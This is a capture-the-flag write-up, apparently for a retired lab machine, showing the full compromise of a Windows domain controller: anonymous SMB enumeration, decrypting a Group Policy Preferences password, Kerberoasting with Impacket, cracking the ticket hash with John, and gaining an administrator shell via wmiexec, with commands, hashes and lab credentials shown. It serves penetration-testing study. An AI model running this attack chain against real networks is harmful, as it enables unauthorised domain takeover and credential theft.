If you want to start your quest to SMB Share mastery this is the machine to try. Pretty much everything required to own this machine resides in abusing an open SMB Share. Very fun and lots to learn. Give a quick read to the notes section at the bottom of this document and add the information to your notes, don't lose hours of your life to Impacket like I did!
Starting with an Namp:
[felixm@blackbear ~]$ nmap -sV -sC 10.10.10.100 PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-20 14:40:37Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: |_clock-skew: 48s | smb2-security-mode: | 2.1: |_ Message signing enabled and required | smb2-time: | date: 2022-04-20T14:41:33 |_ start_date: 2022-04-20T14:38:44
Lots of ports open however I can see port 389 open which is telling me this is likely a Domain Controller. Going through the low hanging fruit I ran RpcClient and got nothing followed by SMBMap and found the following:
[felixm@blackbear ~]$ python3 smbmap.py -H 10.10.10.100
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
SMB has anonymous authentication and we can see there is a read only share called "Replication". Let's connect and look at the contents inside:
[felixm@blackbear ~]$ smbclient \\\\10.10.10.100\\Replication -U '' -N
smb: \> recurse on
smb: \> ls
active.htb D 0 Sat Jul 21 06:37:44 2018
\active.htb
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
\active.htb\DfsrPrivate
ConflictAndDeleted D 0 Wed Jul 18 14:51:30 2018
Deleted D 0 Wed Jul 18 14:51:30 2018
Installing D 0 Wed Jul 18 14:51:30 2018
\active.htb\Policies
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 06:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 06:37:44 2018
\active.htb\scripts
\active.htb\DfsrPrivate\ConflictAndDeleted
\active.htb\DfsrPrivate\Deleted
\active.htb\DfsrPrivate\Installing
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
GPT.INI A 23 Wed Jul 18 16:46:06 2018
Group Policy D 0 Sat Jul 21 06:37:44 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
GPT.INI A 22 Wed Jul 18 14:49:12 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy
GPE.INI A 119 Wed Jul 18 16:46:06 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
Microsoft D 0 Sat Jul 21 06:37:44 2018
Preferences D 0 Sat Jul 21 06:37:44 2018
Registry.pol A 2788 Wed Jul 18 14:53:45 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
Microsoft D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
Windows NT D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences
Groups D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
Windows NT D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
SecEdit D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
Groups.xml A 533 Wed Jul 18 16:46:06 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
SecEdit D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
GptTmpl.inf A 1098 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
GptTmpl.inf A 3722 Wed Jul 18 14:49:12 2018
5217023 blocks of size 4096. 228638 blocks available
This looks like a copy of the SYSVOL folder in the DC. There are potentially some interesting files we can extract from SYSVOL, the one that instantly jumps out to me is Groups.xml which can sometimes contain credentials. Let's pull this back and check the contents:
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> recurse off
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
[felixm@blackbear ~]$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User >
</Groups>
Looks like we have credentials for an account called "SVC_TGS". Just looking at the name I'm assuming this is a Ticket Granting System account? I tried passing the hash and got nothing so let's try and get the clear text password. For passwords set using Group Policy Preferences there is actually a Microsoft distributed AES key we can try to use and a program called gpp-decrypt that will do all the hard work for us:
[felixm@blackbear ~]$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ GPPstillStandingStrong2k18
Nice! We now have clear text credential: SVC_TGS:GPPstillStandingStrong2k18. I tried to remote using Evil-Winrm but no dice. Looking back at the anonymous SMB share there were a few shares with "NO ACCESS" so let's authenticate as "SVC_TGS" and see if we gain access to further information. I looked around and I couldn't find anything of use (other than the user.txt flag).
Since the name of this use is "SVC_TGS" it would suggest that we can perform a Kerberoast attack. We can try this using GetUserSPNs.py Impacket script:
[felixm@blackbear ~]$ sudo impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2022-04-20 20:31:43.861752 $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$2862ff74f9fa8157dd6ab35fd8275baa$3d6f62d7561df2cf815202e8463bd81e6afa9515b7db66bc615d162514b9458e8ab5eafabf87b086e1830f23040ddeaffb26755e82e1563c6394feb9bb8b4353392222dffe1630eb0052873d3ec8b86b208f90718884d2bc8e350a21492aad4a6ee4996dc7d2589372202dfbe1a676858978be13ce14804c9445a483cef6e649baaac1296526ffc1c85899bb643c6a8cbd03dfe5d78fac9893881003724fae17b171bf85250199bb1ba88c7996d16802989826c00dd2834bdc873ba85c6a5ec2dc3090b23b3c7e72b14e72b40378399211e97d36a19c38544a62e92b71b5cf26d059df055445130dfa7002032193b9109fb1eb1cc718e23049c9c4556b9fe899a84bd99cfc412011f3bdbda20ea491d12c7be232c8494973272b22332a8900c168d2ce0e452271335d1dd48bb919ef65f664f93adcb51ca5c6d4cb1f9649aa1ccbad80810ad4aa0aff510db57d303df1df1b12c3149ee04e16175bb1b27e2d70f6722a1d2709570acdd7405f6e67fc9f8826cc9389fc25f298c73eeda646d6584a2a41d67acf4f9344d4ef9d69a291b5833201b80fc342ee961825e5337c24fef6e9a941986e70341fcf764b221daf1288c19868031db533531fee947fea37fd216c89418687de8fa7a633a738c0d629cb78b67d004716c280d8ea81af7b52276fd217210b09f24a4ea2d40b3a77e6e28a4ee931536d6f3fe837f862673f3a15d436b370d17a72b1343fe207a43862844c7fcdd9091c184c7e90001881acab35aa218481af825dde95b072ad9b67c12279ff46645d24fac2c04cb49c73d645795ca11d5c847eabc0c3621994185f24a6237a479c116978d29a2a675b09fe575f6103aa2efdd4be4c4b0e58302c6a914a270c80f75e41c419ef7206be82417469ab499d1b73f93e6f7889c6cd6e816dbceac2c34e265d708539362887ad66364798e5ce62d1698c4a3396d1d964b22e96f385cacd1f737015493d792363920f65e253e2e2fc617a5232f720240429108e18e41eef51cd39628a6d13fb24bf91e9c0faae5a5794096782c89730ffcd8d621b50cd843fe1c2cdcc8500e20ff1a2a6c42f9aa7e20aabf4fbd1bf39f7caaeaf707131b9760991d34dc527b2188cc4efdbb8aa4fdba8b5cdd9126ed9450ca94a75ae0354f9a799ebfe2fb41b0bff0fe4d19bbe16ce40267a13686e5db3fa416360999750e96be4fc103fe4e7e90b185a21b22ea2601cb5cd9fd54ca97b1df042f0f7f41ecc576841b169
Now we have a hash to crack to gain the Administrator's password:
[felixm@blackbear ~]$ john hash.txt --wordlist=~/Downloads/rockyou.txt Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Ticketmaster1968 (?) 1g 0:00:00:03 DONE (2022-04-21 08:54) 0.2793g/s 2943Kp/s 2943Kc/s 2943KC/s Session completed.
We now have the credentials Administrator:Ticketmaster1968. We can try to remote login with these using wmiexec.py:
[felixm@blackbear ~]$ python3 wmiexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100 Impacket v0.9.25.dev1+20220420.133736.116ec395 - Copyright 2021 SecureAuth Corporation [*] SMBv2.1 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami active\administrator
Ok... Rage mode for a second... Who the fuck thought this was a ok error message for Impacket's GetUserSPNs script:
[-] CCache file is not found. Skipping... [-] 'NoneType' object has no attribute 'getCredential'
So to start with, is CCache a file on the target machine that is not there? Is this a local file? I didn't know. After looking around a bunch I found a file called ccache.py in impacket/impacket/krb5. I rightly assumed that there was some sort of issue with Impacket and downloaded older versions, googled errors etc... I lost hours and hours of my life to this until I realized it was a linux package I needed to install... HOW ABOUT AN ERROR MESSAGE LIKE "Ccache package not found, check CCache is installed"... Absolutely unreal.